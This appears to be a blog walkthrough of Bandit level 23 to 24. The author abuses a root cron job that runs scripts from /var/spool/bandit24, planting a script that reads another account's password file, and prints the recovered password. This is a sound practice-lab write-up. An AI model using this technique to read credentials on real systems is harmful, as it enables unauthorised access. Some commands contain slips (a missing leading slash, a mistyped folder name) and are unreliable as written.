Bandit Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Doing the same thing from last level, we found the following script

cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in *;
do
    echo "Handling $i"
    ./$i
    rm -f $i
done

From the description of the script, it will execute all the script inside the $myname folder. We found that there is a bandit24 folder in /var/spool/. Therefore, let’s get a simple script of copying the password to a tmp folder (like two levels before)

mkdir /tmp/b23abc
vim /tmp/b23abc/getpass.sh
cat /tmp/b23abc/getpass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > tmp/b23abc/pass.txt

At this point, I can copy the file to /var/spool/bandit24/ but I remember the permission for execute must be set.

chmod 777 /tmp/b23abc/getpass.sh
cp /tmp/b23abc/getpass.sh /var/spool/bandit24/

However, after couple minutes, I did not get a pass.txt appear in the folder. What I forgot is to set the permission of the folder that the pass.txt is writing into. Wait for a minute and find the file and the content of the next password.

chmod 777 /tmp/b23ac/
cat /tmp/b23abc/pass.txt
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Advertisements